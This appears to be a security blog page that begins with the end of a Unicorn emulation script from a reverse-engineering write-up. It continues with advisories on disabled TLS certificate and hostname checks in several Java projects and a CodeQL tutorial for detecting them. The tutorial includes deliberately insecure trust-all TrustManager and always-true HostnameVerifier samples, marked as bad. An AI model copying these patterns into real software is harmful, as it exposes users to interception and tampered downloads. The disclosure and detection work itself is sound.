mu.reg_write(UC_X86_REG_R11, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R12, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R13, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R14, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R15, 0x0000000000000000)
mu.reg_write(UC_X86_REG_RIP, START_ADDRESS)
# Tracing all instructions with customized callback
def hook_code(uc, address, size, user_data):
print(">>>")
instruction = mu.mem_read(address, size)
dis = disasm(instruction, vma=address)
print(f"0x{address:#x}: {dis}")
r10 = mu.reg_read(UC_X86_REG_R10)
rsp = mu.reg_read(UC_X86_REG_RSP)
rax = mu.reg_read(UC_X86_REG_RAX)
rcx = mu.reg_read(UC_X86_REG_RCX)
rdi = mu.reg_read(UC_X86_REG_RDI)
print(f"r10: {r10:#x}, rsp: {rsp:#x}, rax: {rax:#x}, rcx: {rcx:#x}, rdi: {rdi:#x}")
if address == 0x19BE:
print(">>> Stopping emulation")
mu.emu_stop()
if "cmp" in dis and rax != rdi:
print(">>> Stopping emulation")
print(p64(rdi^rcx))
mu.emu_stop()
mu.hook_add(UC_HOOK_CODE, hook_code)
# Tracing all memory READ & WRITE
def hook_mem_access(uc, access, address, size, value, user_data):
if access == UC_MEM_WRITE:
print(
f">>> Memory is being WRITTEN at {address:#x}, data size = {size}, data value = {value:#x} ({p64(value)})"
)
else: # READ
print(
f">>> Memory is being READ at {address:#x}, data size = {size}, data value = {value:#x} ({(mu.mem_read(address, size))})"
)
mu.hook_add(UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, hook_mem_access)
# Emulate code in infinite time & unlimited instructions
mu.emu_start(START_ADDRESS, ADDRESS + len(binary))
See this Stack Overflow answer for more information. ↩
Newer binaries use the LC_MAIN load command, which is not present in this binary. ↩
ptrace is called, because rax is set to 0x1a in the initial register state. ↩
The HttpUtils#getURLConnection function of apache/calcite disabled hostname verification and used an insecure TrustManager for HTTPS connections making clients vulnerable to a machine-in-the-middle attack (MiTM).
Commit ab19f981
The HttpUtils#getURLConnection disables hostname verification by using a hostname verifier that accepts all hostnames by always returning true. The method also uses an insecure TrustManager that trusts all certificates even self-signed certificates.
Disabled hostname verification allows an attacker to use any valid certificate when intercepting a connection. Even when the hostname of the certificate does NOT match the hostname of the connection.
An insecure TrustManager allows an attacker to create a self-signed certificate that matches the hostname of the intercepted connection.
Machine-in-the-middle attack.
This issue was discovered and reported by @intrigus-lgtm.
You can contact the ISL at [email protected]. Please include a reference to ISL-2020-005 in any communication regarding this issue.
apache/fineract disabled hostname verification and used an insecure TrustManager for HTTPS connections making clients vulnerable to a machine-in-the-middle attack (MiTM).
Commit d83bdc41
The ProcessorHelper#configureClient method disables hostname verification by using a hostname verifier that accepts all hostnames by always returning true. The method also uses an insecure TrustManager that trusts all certificates even self-signed certificates.
Disabled hostname verification allows an attacker to use any valid certificate when intercepting a connection. Even when the hostname of the certificate does NOT match the hostname of the connection.
An insecure TrustManager allows an attacker to create a self-signed certificate that matches the hostname of the intercepted connection.
Machine-in-the-middle attack.
This issue was discovered and reported by @intrigus-lgtm.
You can contact the ISL at [email protected]. Please include a reference to ISL-2020-006 in any communication regarding this issue.
opencast/opencast disabled hostname verification and used an insecure TrustManager for HTTPS connections making clients vulnerable a to machine-in-the-middle attack (MiTM).
Commit 4b905437
The HttpClientImpl class disables hostname verification by using a hostname verifier that accepts all hostnames by always returning true. The method also uses an insecure TrustManager that trusts all certificates even self-signed certificates.
Disabled hostname verification allows an attacker to use any valid certificate when intercepting a connection. Even when the hostname of the certificate does NOT match the hostname of the connection.
An insecure TrustManager allows an attacker to create a self-signed certificate that matches the hostname of the intercepted connection.
Machine-in-the-middle attack.
This issue was discovered and reported by @intrigus-lgtm.
You can contact the ISL at [email protected]. Please include a reference to ISL-2020-007 in any communication regarding this issue.
openMF/mifos-mobile disabled hostname verification and used an insecure TrustManager for HTTPS connections making clients vulnerable a to machine-in-the-middle attack (MiTM).
Commit 7ed4f22f
The SelfServiceOkHttpClient class disables hostname verification by using a hostname verifier that accepts all hostnames by always returning true. The method also uses an insecure TrustManager that trusts all certificates even self-signed certificates.
Disabled hostname verification allows an attacker to use any valid certificate when intercepting a connection. Even when the hostname of the certificate does NOT match the hostname of the connection.
An insecure TrustManager allows an attacker to create a self-signed certificate that matches the hostname of the intercepted connection.
Machine-in-the-middle attack.
This issue was discovered and reported by @intrigus-lgtm.
You can contact the ISL at [email protected]. Please include a reference to ISL-2020-008 in any communication regarding this issue.
ballerina-platform/ballerina-lang used an insecure TrustManager for HTTPS connections making clients vulnerable a to machine-in-the-middle attack (MiTM) and remote code execution (RCE).
ballerina-platform/ballerina-lang
Commit 9a4d1967
The Ballerina programming language provides the bal tool for managing everything related to Ballerina.
Dependency management is done using the bal pull/push/search commands that allow to download/upload packages from the central repository or search for a package.
I’m focusing on the bal pull command, the other sub-commands have the same problem and similar execution flow.
The bal pull command is internally represented by the PullCommand class which will delegate the actual work to the CentralAPIClient#pullPackage method.
The pullPackage method then calls the Utils#initializeSsl method which claims to “initializes SSL” but actually enables an insecure TrustManager (defined here).
An insecure TrustManager allows an attacker to create a self-signed certificate that matches the hostname of the intercepted connection.
After an attacker has forged such a certificate they can intercept and manipulate the requested package and include arbitrary code! Because the issue affects both downloading and uploading of packages this could also be used for a supply-chain attack.
Machine-in-the-middle attack. Remote code execution. Supply chain attack.
This issue was discovered and reported by @intrigus-lgtm.
You can contact the ISL at [email protected]. Please include a reference to ISL-2021-001 in any communication regarding this issue.
In this post, I want to show how I found five vulnerabilities in usage of the Java TrustManager and HostnameVerifier classes.
I start with a short section about what a certificate is, what CodeQL is, and finally I explain the query I used to find the vulnerabilities.
A certificate associates an identity (hostname, personal identity, …) with a public key and can either be signed by a Certificate Authority (CA) or be self-signed. A CA is a trusted third party that verifies the identity of the owner of the certificate and signs the certificate with their own private key. Both browsers and operating systems come with a set of CAs that they trust by default 1.
When a client connects to a server using TLS, the server sends its certificate to the client. The client then verifies the certificate by checking whether it is signed by a trusted CA and whether the hostname of the server matches the hostname in the certificate. If the certificate is valid, the client will establish a secure and encrypted connection with the server.
The problem is that the client can be configured to trust certificates that are not signed by a trusted CA or that don’t match the hostname of the server. This is usually done for testing purposes, but it can also be done by mistake or just as an oversight.
Browsers usually get this right, but there have also been cases in the past where they incorrectly implemented hostname verification 23 or where they had other problems verifying a certificate 4.
In this post I’m going to focus on Java applications that use the TrustManager or HostnameVerifier classes unsafely.
CodeQL is a static analysis tool that has been developed by Semmle - now @ Github.
It can be used both for (targeted) variant analysis and also (less targeted) analysis of entire bug classes like XSS, SSRF, and many more.
CodeQL has a simple but powerful, logical query language. If you want to learn more about CodeQL I recommend reading the CodeQL documentation.
So what is an insecure TrustManager?
A TrustManager is insecure if it accepts all certificates, regardless of whether they are signed by a trusted CA or not.
This is usually done by implementing the checkServerTrusted method of the X509TrustManager interface and never throwing an exception – therefore accepting all certificates.
In code this would look like this:
class InsecureTrustManager implements X509TrustManager {
@Override
public X509Certificate[] getAcceptedIssuers() {
return null;
}
@Override
public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
// BAD: Does not verify the certificate chain, allowing any certificate.
}
@Override
public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
}
}
If we then use this TrustManager like so in our application:
SSLContext sslContext = SSLContext.getInstance("TLS");
sslContext.init(null, new TrustManager[] { new InsecureTrustManager() }, null);
HttpsURLConnection connection = (HttpsURLConnection) new URL("https://untrusted-root.badssl.com/").openConnection();
connection.setSSLSocketFactory(sslContext.getSocketFactory());
connection.connect();
We will happily connect to the server even though the certificate is not signed by a trusted CA.
When writing a query it’s very helpful to verbalize the query:
We want to find all cases where an insecure TrustManager is used to initialize an SSLContext.
This means that we have a data flow query and we “just” have to define the source and the sink!
We can directly translate this into a CodeQL from clause:
from InsecureTrustManagerFlow::PathNode source, InsecureTrustManagerFlow::PathNode sink
sources are all TrustManager instances that are insecure and sinks are all SSLContext instances that are initialized with an insecure TrustManager!
Our where clause then only has to ensure that the source is actually used at the sink, that is, we need flowPath to hold:
where InsecureTrustManagerFlow::flowPath(source, sink)
The select clause then adds a message at the location of the SSLContext#init method and also references where the trust manager has been defined:
select sink, source, sink, "This uses $@, which is defined in $@ and trusts any certificate.",
source, "TrustManager",
source.getNode().asExpr().(ClassInstanceExpr).getConstructedType() as type, type.nestedName()
The rest of the query contains a little bit of boilerplate to make the query better structured and reusable.
(The main query can be found here, support files are in InsecureTrustManager.qll and InsecureTrustManagerQuery.qll).
(Some parts of the query are shown simplified)
The InsecureTrustManagerSource class models all TrustManager instances that are insecure on the data flow level 5 by viewing the node as an expression and then checking whether its constructed type 6 is an InsecureX509TrustManager.
private class InsecureTrustManagerSource extends DataFlow::Node {
InsecureTrustManagerSource() {
this.asExpr().(ClassInstanceExpr).getConstructedType() instanceof InsecureX509TrustManager
}
}
InsecureX509TrustManager is a class that models all classes deriving from X509TrustManager (#1) that have overridden the “checkServerTrusted” method (#2) and that never throw a CertificateException (#3).
private class InsecureX509TrustManager extends RefType {
InsecureX509TrustManager() {
this.getAnAncestor() instanceof X509TrustManager and // #1
exists(Method m |
m.getDeclaringType() = this and
m.hasName("checkServerTrusted") and // #2
not mayThrowCertificateException(m) // #3
)
}
}
Under what conditions can a method throw a CertificateException?
When it contains a throw statement that throws a CertificateException (#4) or when it calls a method (#5) that may throw a CertificateException (#6) or if there is no source code available for the called method and the method has a @throws annotation that mentions CertificateException (#7).
private predicate mayThrowCertificateException(Method m) {
exists(ThrowStmt throwStmt | // #4
throwStmt.getThrownExceptionType().getAnAncestor() instanceof CertificateException // #4
|
throwStmt.getEnclosingCallable() = m // #4
)
or
exists(Method otherMethod | m.polyCalls(otherMethod) | // #5
mayThrowCertificateException(otherMethod) // #6
or
not otherMethod.fromSource() and // #7
otherMethod.getAnException().getType().getAnAncestor() instanceof CertificateException // #7
)
}
The InsecureTrustManagerSink class models all cases where any TrustManager (#8) is used to init (#9) an SslContext (#10).
private class InsecureTrustManagerSink extends DataFlow::Node {
InsecureTrustManagerSink() {
exists(MethodCall ma, Method m |
m.hasName("init") and // #9
m.getDeclaringType() instanceof SslContext and // #10
ma.getMethod() = m
|
ma.getArgument(1) = this.asExpr() // #8
)
}
}
The InsecureTrustManagerConfig module then simply combines the source (#11) and the sink (#12) like this:
module InsecureTrustManagerConfig implements DataFlow::ConfigSig {
predicate isSource(DataFlow::Node source) { source instanceof InsecureTrustManagerSource } // #11
predicate isSink(DataFlow::Node sink) { sink instanceof InsecureTrustManagerSink } // #12
}
However, we have a slight problem: remember that we have a data flow query and not a taint tracking query. Recall the example from above:
SSLContext sslContext = SSLContext.getInstance("TLS");
sslContext.init(null,
new TrustManager[] { // #14
new InsecureTrustManager() // #13 #14
} // #14
, null);
We want to find flow from #13 to the second (1 in the definition of InsecureTrustManagerSink, because CodeQL is zero-based) argument of init.
However, #13 is an array element and cannot flow to the array itself (#14) (CodeQL distinguishes between the array elements and the array itself). To fix this, we can allow implicit reads of array elements by overriding the allowImplicitRead predicate.
predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
(isSink(node) or isAdditionalFlowStep(node, _)) and
node.getType() instanceof Array and
c instanceof DataFlow::ArrayContent
}
This predicate allows implicit reads of array elements when the array is used as a sink or when it is used as an additional flow step. By enabling implicit reads, CodeQL will not distinguish between data stored inside something (in a field, in an array as an element, in a map as a key or value, …) and the thing itself (the object the field belongs to, the array where the element is in, the map where the key/value is from, …) 7.
So what is disabled hostname verification?
Hostname verification is disabled if we have a HostnameVerifier that always returns true in its verify method.
Always returning true means that we will accept any hostname, regardless of whether it matches the hostname in the certificate or not!
In code this would look like this:
HostnameVerifier verifier = new HostnameVerifier() {
@Override
public boolean verify(String hostname, SSLSession session) {
return true; // BAD: accept even if the hostname doesn't match
}
};
If we then use this HostnameVerifier like so in our application:
HttpsURLConnection connection = (HttpsURLConnection) new URL("https://wrong.host.badssl.com/").openConnection();
connection.setHostnameVerifier(verifier);
connection.connect();
We will happily connect to the server even though the certificate is not valid for the wrong.host.badssl.com domain 8.
Again, when writing a query it’s very helpful to verbalize the query:
We want to find all cases where an all-accepting HostnameVerifier is used in a HttpsURLConnection#set(Default)HostnameVerifier call.
This means that we again have a data flow query and we “just” have to define the source and the sink!
We can directly translate this into a CodeQL from clause:
from
TrustAllHostnameVerifierFlow::PathNode source, TrustAllHostnameVerifierFlow::PathNode sink
sources are all HostnameVerifier instances that are all-accepting and sinks are all HttpsURLConnection#set(Default)HostnameVerifier calls!
Our where clause then only has to ensure that the source is actually used at the sink, that is, we need flowPath to hold:
where TrustAllHostnameVerifierFlow::flowPath(source, sink)
The select clause then adds a message at the location of the HttpsURLConnection#set(Default)HostnameVerifier method and also references where the all-accepting hostname verifier has been defined:
select sink, source, sink,
"The $@ defined by $@ always accepts any certificate, even if the hostname does not match.",
source, "hostname verifier", source.getNode().asExpr().(ClassInstanceExpr).getConstructedType() as verifier, "this type"
The rest of the query contains a little bit of boilerplate to make the query better structured and reusable.
(The main query can be found here, support files are inUnsafeHostnameVerificationQuery.qll).
(Some parts of the query are shown simplified)
The TrustAllHostnameVerifier class models all HostnameVerifier instances that accept any hostname by checking whether the instance derives from HostnameVerifier (#1) and if it overrides the verify method (#2) to always return true (#3).
class TrustAllHostnameVerifier extends RefType {
TrustAllHostnameVerifier() {
this.getAnAncestor() instanceof HostnameVerifier and // #1
exists(HostnameVerifierVerify m |
m.getDeclaringType() = this and // #2
alwaysReturnsTrue(m) // #3
)
}
}
When does a method always return true?
When all return statements return true (#4). Note that this is a simplification, there could be methods that always return true in practice/at runtime, but we cannot determine this statically.
private predicate alwaysReturnsTrue(HostnameVerifierVerify m) {
forex(ReturnStmt rs | rs.getEnclosingCallable() = m |
rs.getResult().(CompileTimeConstantExpr).getBooleanValue() = true // #4
)
}
The HostnameVerifierSink class models all cases where any HostnameVerifier is used in e.g. a HttpsURLConnection#setHostnameVerifier call.
private class HostnameVerifierSink extends DataFlow::Node {
HostnameVerifierSink() { sinkNode(this, "hostname-verification") }
}
It does this by using the special sinkNode predicate that gets all nodes that are annotated with hostname-verification in a “Models-as-Data” (MaD) file.
The MaD files can be found in .yml files in the java/ql/lib/ext folder.
In our case, there are three definitions:
- ["javax.net.ssl", "HttpsURLConnection", True, "setDefaultHostnameVerifier", "", "", "Argument[0]", "hostname-verification", "manual"]
- ["javax.net.ssl", "HttpsURLConnection", True, "setHostnameVerifier", "", "", "Argument[0]", "hostname-verification", "manual"]
# from https://github.com/github/codeql/blob/257fe1ad6b5e8e596ece2306213dcfc340420e2c/java/ql/lib/ext/javax.net.ssl.model.yml#L6-L7
- ["org.apache.cxf.configuration.jsse", "TLSClientParameters", True, "setHostnameVerifier", "(HostnameVerifier)", "", "Argument[0]", "hostname-verification", "manual"
# from https://github.com/github/codeql/blob/257fe1ad6b5e8e596ece2306213dcfc340420e2c/java/ql/lib/ext/org.apache.cxf.configuration.jsse.model.yml#L7
The first element is the package name ("javax.net.ssl"), the second element is the class name ("HttpsURLConnection").
The third element is a boolean that indicates whether to jump to an arbitrary subtype of that type (True), the fourth element is the method name ("setDefaultHostnameVerifier") although generally this just selects a specific member (method, field, …) of the type.
The fifth element allows restriction based on the member signature ("" so no filtering is done), the sixth element is not relevant in our case.
The seventh element defines how data enters the sink ("Argument[0]" in our case), the eighth element is the annotation that is used to annotate the sink ("hostname-verification").
The ninth element is the origin of the model (in this case manual because the model has been added manually and not generated by e.g. the model generator). For more information about MaD files have a look at this internal documentation.
The TrustAllHostnameVerifierConfig module then simply combines the source (#5) and the sink (#6) like this:
module TrustAllHostnameVerifierConfig implements DataFlow::ConfigSig {
predicate isSource(DataFlow::Node source) {
source.asExpr().(ClassInstanceExpr).getConstructedType() instanceof TrustAllHostnameVerifier // #5
}
predicate isSink(DataFlow::Node sink) { sink instanceof HostnameVerifierSink } // #6
}
Because we want to reduce false-positives, we add an isBarrier predicate to the query.
This predicate ignores all nodes that are in functions that suggest that they intentionally disable hostname verification.
predicate isBarrier(DataFlow::Node barrier) {
// ignore nodes that are in functions that intentionally disable hostname verification
barrier
.getEnclosingCallable()
.getName()
/*
* Regex: (_)* :
* some methods have underscores.
* Regex: (no|ignore|disable)(strictssl|ssl|verify|verification|hostname)
* noStrictSSL ignoreSsl
* Regex: (set)?(accept|trust|ignore|allow)(all|every|any)
* acceptAll trustAll ignoreAll setTrustAnyHttps
* Regex: (use|do|enable)insecure
* useInsecureSSL
* Regex: (set|do|use)?no.*(check|validation|verify|verification)
* setNoCertificateCheck
* Regex: disable
* disableChecks
*/
.regexpMatch("^(?i)(_)*((no|ignore|disable)(strictssl|ssl|verify|verification|hostname)" +
"|(set)?(accept|trust|ignore|allow)(all|every|any)" +
"|(use|do|enable)insecure|(set|do|use)?no.*(check|validation|verify|verification)|disable).*$")
}
To further reduce false-positives, we also extend the where clause with and not isNodeGuardedByFlag(sink.getNode()) to remove all sinks that are guarded by a flag indicating intentional disabling of hostname verification.
predicate isNodeGuardedByFlag(DataFlow::Node node) {
exists(Guard g | g.controls(node.asExpr().getBasicBlock(), _) | // #7
g = getASecurityFeatureFlagGuard() or g = getAnUnsafeHostnameVerifierFlagGuard() // #8
)
}
A node is guarded when there is a Guard that controls (#7) 9 the node and that is either a security feature flag guard or an unsafe hostname verifier flag guard (#8).
A Guard controls another node when the execution of the controlled node is dependent on the condition specified by the guard.
For example, consider the following code:
if (isHostnameVerificationDisabled()) { // #9
connection.setHostnameVerifier(new TrustAllHostnameVerifier()); // #10
}
Here, the connection.setHostnameVerifier (#10) call is guarded/controlled by the isHostnameVerificationDisabled (#9) method call.
The getASecurityFeatureFlagGuard predicate gets some pre-defined guards indicating intentional disabling of a security feature while the getAnUnsafeHostnameVerifierFlagGuard predicate gets guards specific to hostname verification. For that reason, we extend the existing FlagKind class.
All we have to do is to override the getAFlagName predicate to get all strings that should be considered a flag.
private class UnsafeHostnameVerificationFlag extends FlagKind {
UnsafeHostnameVerificationFlag() { this = "UnsafeHostnameVerificationFlag" }
bindingset[result]
override string getAFlagName() {
result
.regexpMatch("(?i).*(secure|disable|selfCert|selfSign|validat|verif|trust|ignore|nocertificatecheck).*") and
result != "equalsIgnoreCase"
}
}
By extending the FlagKind class, we get all the functionality of the FlagKind class for free! Namely, we get the getAFlag predicate that gets all flags that are used to guard a node.
private Guard getAnUnsafeHostnameVerifierFlagGuard() {
result = any(UnsafeHostnameVerificationFlag flag).getAFlag().asExpr()
}
This completes the implementation of isNodeGuardedByFlag and allows us to heavily reduce false-positives!
In this post I showed how to find multiple CVEs in the usage of the Java TrustManager and HostnameVerifier classes using CodeQL.
I did this by using a data flow query that finds all cases where an insecure TrustManager or an all-accepting HostnameVerifier is used.
Many – if not most – problems can be viewed as data flow/taint tracking problems and CodeQL is a great tool to solve these problems!
These CAs can and will be removed when there are problems with them, see e.g. https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/oxX69KFvsm4, https://wiki.mozilla.org/CA/Symantec_Issues, or https://www.techtarget.com/searchsecurity/news/252527914/Mozilla-Microsoft-drop-Trustcor-as-root-certificate-authority. ↩
There are multiple “levels” in CodeQL. The data flow level is the highest level and is partially shared across all languages supported by CodeQL while the abstract syntax tree level is specific to each language and is the lowest level. ↩
A ClassInstanceExpr is for example new FooBar() and getConstructedType gets the type of the constructed object, in this case FooBar. ↩
For more information about implicit reads see this discussion. ↩
The certificate is only valid for *.badssl.com and badssl.com. Wildcard certificates – like *.badssl.com – only apply to one level of subdomains, so wrong.host.badssl.com is not covered by the certificate, but host.badssl.com or foobar.badssl.com would be. ↩
Technically, the Guard verifies that it controls the basic block that contains the node. ↩